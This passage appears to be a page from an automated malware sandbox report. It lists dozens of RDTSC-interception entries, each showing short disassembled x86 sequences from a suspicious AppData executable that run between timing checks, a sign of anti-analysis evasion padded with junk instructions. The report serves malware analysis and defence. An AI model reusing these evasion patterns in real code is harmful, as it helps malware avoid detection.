[ebp+122D29CCh], eax 0x0000005b js 00007F5828CEC312h 0x00000061 sub dword ptr [ebp+122D1F2Ch], ecx 0x00000067 mov esi, 0000003Ch 0x0000006c cld 0x0000006d add esi, dword ptr [esp+24h] 0x00000071 mov dword ptr [ebp+122D1A4Ch], esi 0x00000077 lodsw 0x00000079 jmp 00007F5828CEC318h 0x0000007e add eax, dword ptr [esp+24h] 0x00000082 clc 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 stc 0x00000088 push eax 0x00000089 push esi 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96BB0A second address: 96BB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], esi 0x00000009 sbb edx, 0589A7FFh 0x0000000f nop 0x00000010 je 00007F5828704A74h 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F5828704A66h 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 98080F second address: 980834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC30Ch 0x00000009 popad 0x0000000a jg 00007F5828CEC308h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007F5828CEC306h 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 980834 second address: 98083E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96BDEC second address: 96BE5D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F5828CEC308h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F5828CEC308h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 pushad 0x00000045 mov cl, B4h 0x00000047 mov edi, ebx 0x00000049 popad 0x0000004a nop 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jng 00007F5828CEC306h 0x00000054 jmp 00007F5828CEC30Dh 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96C556 second address: 96C55B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96C5F5 second address: 96C60E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F5828CEC308h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F5828CEC306h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96C60E second address: 96C618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96C618 second address: 96C61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96C61C second address: 96C69A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F5828704A68h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 pushad 0x00000027 jmp 00007F5828704A6Ch 0x0000002c mov edi, dword ptr [ebp+122D1A3Eh] 0x00000032 popad 0x00000033 mov edi, dword ptr [ebp+122D1994h] 0x00000039 pushad 0x0000003a mov eax, dword ptr [ebp+122D23CDh] 0x00000040 mov si, di 0x00000043 popad 0x00000044 lea eax, dword ptr [ebp+1247FFF4h] 0x0000004a jmp 00007F5828704A70h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F5828704A72h 0x00000057 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96C69A second address: 96C6E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5828CEC30Eh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+124492F7h], eax 0x00000014 lea eax, dword ptr [ebp+1247FFB0h] 0x0000001a mov dx, 4AC5h 0x0000001e nop 0x0000001f jmp 00007F5828CEC315h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jnp 00007F5828CEC308h 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96C6E2 second address: 96C6EC instructions: 0x00000000 rdtsc 0x00000002 js 00007F5828704A6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 997657 second address: 99766F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5828CEC314h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 997A93 second address: 997A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 997A99 second address: 997AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 997AA7 second address: 997AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 997AAD second address: 997AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 997AB3 second address: 997AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 997AB7 second address: 997ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC310h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F5828CEC30Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 997D94 second address: 997D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 997D9A second address: 997DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F5828CEC30Eh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 997DB3 second address: 997DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 pushad 0x00000008 jc 00007F5828704A66h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99E155 second address: 99E159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99E159 second address: 99E1A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5828704A77h 0x0000000b jmp 00007F5828704A6Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5828704A77h 0x00000017 jmp 00007F5828704A6Ah 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99E1A8 second address: 99E1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99CE36 second address: 99CE46 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828704A66h 0x00000008 jo 00007F5828704A66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99CE46 second address: 99CE85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F5828CEC306h 0x00000012 jmp 00007F5828CEC319h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99CFF5 second address: 99D045 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5828704A72h 0x00000008 pop esi 0x00000009 pushad 0x0000000a je 00007F5828704A66h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jbe 00007F5828704A66h 0x00000018 jmp 00007F5828704A6Eh 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push ecx 0x00000022 jmp 00007F5828704A72h 0x00000027 push edx 0x00000028 pop edx 0x00000029 pop ecx 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99D199 second address: 99D1AA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5828CEC306h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99D353 second address: 99D37A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A79h 0x00000009 jmp 00007F5828704A6Ah 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99D5E0 second address: 99D5E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99D73E second address: 99D76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828704A74h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5828704A6Ch 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99C87D second address: 99C885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99C885 second address: 99C8AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F5828704A66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99C8AC second address: 99C8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A3E4C second address: 9A3E74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F5828704A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F5828704A79h 0x00000015 jmp 00007F5828704A73h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A3E74 second address: 9A3E79 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 92E123 second address: 92E12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A2B66 second address: 9A2B9F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F5828CEC315h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5828CEC30Eh 0x0000001a jnc 00007F5828CEC306h 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A2B9F second address: 9A2BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A2CE2 second address: 9A2CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A2CE8 second address: 9A2CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A2CED second address: 9A2D14 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828CEC30Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jng 00007F5828CEC306h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5828CEC312h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A2D14 second address: 9A2D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5828704A75h 0x00000010 jmp 00007F5828704A6Dh 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A3117 second address: 9A312D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5828CEC306h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jg 00007F5828CEC306h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A325A second address: 9A3260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A3260 second address: 9A3264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A3264 second address: 9A3279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A71h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A3279 second address: 9A3287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F5828CEC306h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A36E1 second address: 9A36E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A36E5 second address: 9A3706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Dh 0x00000007 ja 00007F5828CEC306h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F5828CEC306h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A3706 second address: 9A370A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A370A second address: 9A3728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F5828CEC312h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A3728 second address: 9A372C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A6B5B second address: 9A6B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A6B5F second address: 9A6B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5828704A78h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5828704A71h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9A6B8E second address: 9A6BC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC315h 0x00000007 push edi 0x00000008 jg 00007F5828CEC306h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5828CEC318h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 92C64F second address: 92C658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9AD5DD second address: 9AD5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9AD5E1 second address: 9AD5F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnp 00007F5828704A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9AD5F0 second address: 9AD5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5828CEC306h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9AD149 second address: 9AD16B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A78h 0x00000007 jnc 00007F5828704A66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9AD16B second address: 9AD1AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC310h 0x00000007 jmp 00007F5828CEC313h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5828CEC316h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9AD303 second address: 9AD30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5828704A66h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9AD30D second address: 9AD311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B078F second address: 9B07AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5828704A75h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B07AE second address: 9B07D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F5828CEC317h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9291AF second address: 9291B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B00DE second address: 9B010B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC318h 0x00000007 jmp 00007F5828CEC30Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B0233 second address: 9B0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B4568 second address: 9B4572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F5828CEC306h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B3C44 second address: 9B3C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5828704A6Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B41EB second address: 9B41EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B41EF second address: 9B4203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F5828704A72h 0x0000000c jns 00007F5828704A66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B4203 second address: 9B4214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5828CEC30Bh 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B4214 second address: 9B4218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B7BBC second address: 9B7BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B7BC0 second address: 9B7BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A73h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B7BD9 second address: 9B7BE3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5828CEC312h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9B7BE3 second address: 9B7BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9BD838 second address: 9BD852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC315h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9BD9C4 second address: 9BD9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9BDB98 second address: 9BDBC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 jg 00007F5828CEC312h 0x0000000d jns 00007F5828CEC306h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
